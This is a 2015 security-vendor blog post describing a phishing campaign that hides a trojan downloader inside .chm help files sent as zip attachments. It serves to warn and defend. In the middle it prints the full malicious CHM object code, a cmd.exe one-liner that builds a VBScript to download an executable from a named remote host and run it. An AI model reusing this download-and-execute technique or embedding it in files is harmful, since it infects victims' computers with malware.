MailGuard Editor 03 March 2015 23:43:00 AEDT 3 MIN READ

Zero Day Malware Variant ‘Cryptor’ Embedded In .CHM Documents

Early this morning, MailGuard have identified a new form of malware propagation where trojan downloaders are being embedded in .chm documents. Here is a sample email:

image 1 20150303

The malicious emails have .zip file attachments (in this case the zip file is named Transaction info E579657586.zip), which contain the .chm files.

.chm files are essentially compiled html files (web pages), which Microsoft (and others) use as part of their help system.

Here is an example of an opened .chm file running on a Microsoft Windows system.

image 2 NEW 20150303

The .chm file contained some Visual Basic script which when executed, downloads malware:

========================================================================================

OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",cmd.exe,/c @echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)>tt.vbs&@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://www.igloofire.com/tmp/tv.exe&quot;,false>>tt.vbs&@echo objXMLHTTP.send()>>tt.vbs&@echo If objXMLHTTP.Status=200 Then>>tt.vbs&@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)>>tt.vbs&@echo objADOStream.Open>>tt.vbs&@echo objADOStream.Type=1 >>tt.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>tt.vbs&@echo objADOStream.Position=0 >>tt.vbs&@echo objADOStream.SaveToFile &quot;t.exe&quot;>>tt.vbs&@echo objADOStream.Close>>tt.vbs&@echo Set objADOStream=Nothing>>tt.vbs&@echo End if>>tt.vbs&@echo Set objXMLHTTP=Nothing>>tt.vbs&@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)>>tt.vbs&@echo objShell.Exec(&quot;t.exe&quot;)>>tt.vbs&cscript.exe tt.vbs ,">
<PARAM name="Item2" value="273,1,1">

========================================================================================

The Visual Basic script downloads an ‘executable’ from a remote web server and runs it locally. You can actually see the target location above which contains the payload (bold and underlined). The remote executable (tv.exe) is the final payload, and has been identified as the Cryptor virus, as initially identified by AVG. Please note, this is not the same as the Cryptolocker virus and the effects of downloading Cryptor through scam email and infected websites is not the same.

The Cryptor designated malware causes havoc on the system installed by secretly installing malware and possibly interrupting normal use of the infected PC by interfering with system processes. It is also used to control the victim's machine and can act as a gateway to installing new malware.

Cryptor is dangerous because of the fact it constantly mutates and updates, stealing data and compromising business security.

MailGuard CEO Craig McDonald stated,

“This is a timely reminder to businesses that user education is important to protect the corporate networks from the effects of installing malware such as Cryptor. Zero day attacks are successful because there is a window of time before desktop AV vendors update software to detect these scams. Unless businesses take on a multi-layered approach to network security, including cloud and endpoint security, they are increasing the risk of becoming a target of cybercrime”.

MailGuard identified the first sample early this morning, and at the time was only being picked up by 2 out of the top 57 AV vendors on the market. This latest spate of Cryptor delivered via email and web is being blocked by MailGuard’s cloud filtering services.